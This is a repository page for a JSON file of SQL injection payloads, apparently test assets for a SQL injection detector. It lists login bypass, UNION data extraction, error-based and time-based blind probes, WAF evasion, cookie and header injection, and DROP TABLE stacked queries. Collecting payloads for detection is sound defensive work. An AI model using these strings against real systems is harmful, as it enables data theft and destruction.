zhongwei/gh-jeremylongshore-claude-code-plugins-plus-plugins-security-sql-injection-detector
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
gh-jeremylongshore-claude-c…/skills/sql-injection-detector/assets/sqli_payloads.json
Zhongwei Li 9f5d7e282a Initial commit
2025-11-30 08:22:41 +08:00

131 lines
4.7 KiB
JSON
Raw Permalink Blame History

{
"_comment": "SQL Injection Payloads for different attack vectors.",
"payloads": [
{
"_comment": "Basic SQL Injection payloads",
"type": "basic",
"description": "Simple single quote injection.",
"payload": "' OR '1'='1",
"database": "all",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q=' OR '1'='1"
},
{
"_comment": "Numeric context bypass",
"type": "numeric",
"description": "Bypass numeric context with string injection.",
"payload": "1 OR 1=1",
"database": "all",
"vector": "GET/POST Parameter",
"example": "https://example.com/item?id=1 OR 1=1"
},
{
"_comment": "String concatenation for MySQL",
"type": "string_concat",
"description": "String concatenation in MySQL.",
"payload": "\" UNION SELECT user(), database() -- -",
"database": "mysql",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q=\" UNION SELECT user(), database() -- -"
},
{
"_comment": "String concatenation for PostgreSQL",
"type": "string_concat",
"description": "String concatenation in PostgreSQL.",
"payload": "' || (SELECT user) || '",
"database": "postgresql",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q=' || (SELECT user) || '"
},
{
"_comment": "String concatenation for SQL Server",
"type": "string_concat",
"description": "String concatenation in SQL Server.",
"payload": "'+(SELECT user)+'",
"database": "sqlserver",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q='+(SELECT user)+'"
},
{
"_comment": "String concatenation for Oracle",
"type": "string_concat",
"description": "String concatenation in Oracle.",
"payload": "'||(SELECT user FROM dual)||'",
"database": "oracle",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q='||(SELECT user FROM dual)||'"
},
{
"_comment": "Error-based SQL injection (MySQL)",
"type": "error_based",
"description": "Error-based SQL injection using `extractvalue()` in MySQL.",
"payload": "' AND extractvalue(rand(),concat(0x3a,(select user()))) #",
"database": "mysql",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q=' AND extractvalue(rand(),concat(0x3a,(select user()))) #"
},
{
"_comment": "Time-based blind SQL injection (MySQL)",
"type": "time_based",
"description": "Time-based blind SQL injection using `sleep()` in MySQL.",
"payload": "' AND IF(substring(user(),1,1)='r',sleep(5),1) #",
"database": "mysql",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q=' AND IF(substring(user(),1,1)='r',sleep(5),1) #"
},
{
"_comment": "Boolean-based blind SQL injection (MySQL)",
"type": "boolean_based",
"description": "Boolean-based blind SQL injection (MySQL).",
"payload": "' AND 1=1 #",
"database": "mysql",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q=' AND 1=1 #"
},
{
"_comment": "Stacked queries (MySQL)",
"type": "stacked_queries",
"description": "Stacked queries injection in MySQL.",
"payload": "'; DROP TABLE users;--",
"database": "mysql",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q='; DROP TABLE users;--"
},
{
"_comment": "Bypass WAF with obfuscation",
"type": "waf_bypass",
"description": "Bypassing WAF with case randomization.",
"payload": "' UnIoN SeLeCt 1,2,3 -- -",
"database": "all",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q=' UnIoN SeLeCt 1,2,3 -- -"
},
{
"_comment": "Cookie-based injection",
"type": "cookie",
"description": "SQL injection in cookie value.",
"payload": "' OR '1'='1",
"database": "all",
"vector": "Cookie",
"example": "Set-Cookie: sessionid=' OR '1'='1"
},
{
"_comment": "Header-based injection",
"type": "header",
"description": "SQL injection in HTTP Header value.",
"payload": "' OR '1'='1",
"database": "all",
"vector": "HTTP Header",
"example": "X-Forwarded-For: ' OR '1'='1"
},
{
"_comment": "SQLite injection",
"type": "basic",
"description": "Basic SQLite injection.",
"payload": "'); DROP TABLE users; --",
"database": "sqlite",
"vector": "GET/POST Parameter",
"example": "https://example.com/search?q='); DROP TABLE users; --"
}
]
}
Reference in New Issue View Git Blame Copy Permalink